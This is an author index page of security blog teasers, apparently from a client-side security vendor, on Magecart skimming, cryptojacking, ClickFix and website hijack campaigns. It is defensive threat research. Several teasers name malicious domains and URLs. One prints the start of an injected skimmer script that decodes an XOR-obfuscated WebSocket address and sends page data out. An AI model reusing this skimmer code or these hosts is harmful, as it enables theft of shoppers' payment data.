Articles by Himanshu Anand
CryptoJacking is dead: long live CryptoJacking
Modern crypto jacking has evolved into a silent, multi-stage attacks.
Himanshu AnandMagecart targeting east asian e-commerce websites on OpenCart
We’ve detected a magecart-style attack targeting the OpenCart CMS platform
Himanshu AnandHow traffic hijacking and affiliate fraud can harm websites and users
Traffic hijacking is when someone secretly changes where a website’s links go, sending visitors to other sites.
Himanshu AnandIs relying on Indicators of Compromise secure enough?
Most security programs today still rely heavily on Indicators of Compromise (IOCs). This approach fails to detect threats that evolve slowly, reuse infrastructure, or operate in narrow, high-value contexts like client-side web skimming.
Himanshu AnandCoinMarketCap Client-Side Attack: A Comprehensive Analysis
On June 20, 2025, CoinMarketCap (CMC) - a cornerstone of the cryptocurrency ecosystem, relied upon by millions for real-time crypto data - experienced a significant security incident.
Himanshu AnandWeaponized Google OAuth Triggers Malicious WebSocket
An attacker is using ‘Google.com’ to deliver and execute their own code in a weaponized Google OAuth attack.
Himanshu AnandRuthless Client-Side Attacks Targeting Multiple Platforms with ClickFix
In this article, we break down a recent ClickFix variant that now targets macOS, Android, and iOS, using browser-based redirections, fake UI prompts, and even drive-by download techniques.
Himanshu AnandChinese Adult Scam Targets Mobile Users Through PWA
We’ve identified a fresh injection campaign abusing third-party JavaScript to redirect users.
Himanshu AnandOver 150K websites hit by full-page hijack linking to Chinese gambling sites
We estimate that approximately 150,000 websites have been impacted by this campaign. The script defines an array of keywords related to betting, gambling, and casino brands both in English and Chinese.
Himanshu AnandThousands of websites hit by four backdoors in 3rd party JavaScript attack
While analyzing threats targeting WordPress frameworks, we found an attack where a single 3rd party JavaScript file was used to inject four separate backdoors into 1,000 compromised websites using cdn.csyndication[.]com/.
Himanshu AnandOver 35,000 Websites Targeted in Full-Page Hijack Linking to a Chinese-Language Gambling Scam
A new malware campaign has compromised 35,000+ websites, injecting a malicious script from the websites listed below. Once the script loads, it fully hijacks the user’s browser window—often redirecting them to pages promoting a Chinese-language gambling (or casino) platform.
Himanshu Anand10,000 WordPress Websites Found Delivering MacOS and Windows Malware
We identified over 10,000 WordPress loading showing fake Google browser update leading to malware downloads.
Himanshu AnandGovernment and university websites targeted in ScriptAPI[.]dev client-side attack
Yesterday we discovered another client-side JavaScript attack targeting +500 websites, including governments and universities. The injected scripts create hidden links in the Document Object Model (DOM), pointing to external websites, a programming interface for web documents.
Himanshu AnandThe cost of false positives - how we became a target
This week, we identified an intriguing use case involving the WP3[.]XYZ attack (link to our blog post). It sparked interest across the community and led to better detection rates on platforms like VirusTotal (VirusTotal link). While most appreciated our efforts, others criticized us for not identifying the root cause or recommending services to clean up hacked websites. Despite this, we aim to make the community aware of potential attacks and promise to do even better in the future. When fals
Himanshu AnandOver 5,000 WordPress sites caught in WP3[.]XYZ malware attack
We’ve uncovered a widespread malware campaign targeting WordPress websites, affecting over 5,000 sites globally. The malicious domain: "https://wp3.xyz/plugin[.]php".
Himanshu AnandNew 3rd party JS script attack found: Artifyau[.]com and Quantifymy[.]com
This week, we deployed a specialized crawler for research purposes. Within just 24 hours, it successfully identified new Magecart attack patterns. Magecart is a sophisticated, financially motivated threat that injects malicious JavaScript to steal personal payment information. Here's a list of the biggest Magecart attacks thus far. Initial Detection: Obfuscated JavaScript on Artifyau[.]com Detected URL: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. The URL mimics a
Himanshu AnandNew Magecart attack code revealed
On October 14th, we posted an article on how another Magento Magecart attack was taking place. Then we only noticed one script as the culprit. Today, we were able to find and analyze the attack in more detail. The attack decoded This was the injected code: <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h
Himanshu AnandKuwait ecommerce site is being used to facilitate client-side skimming attacks
A popular e-commerce site in Kuwait, running an outdated version of Magento (2.4), has been compromised by a malicious JavaScript injection,
Himanshu AnandCisco client-side Magecart JavaScript attack
Another day, another high-profile client-side JavaScript attack. This morning, we read that Cisco is the next victim of malicious code being
Himanshu AnandWeb supply chain attack through trojanized jQuery on npm, GitHub and CDNs
Attacks have been found in trojanized jQuery on GitHub, npm and jsDelivr in a new web supply chain attack. Each package had a copy of jQuery
Himanshu Anand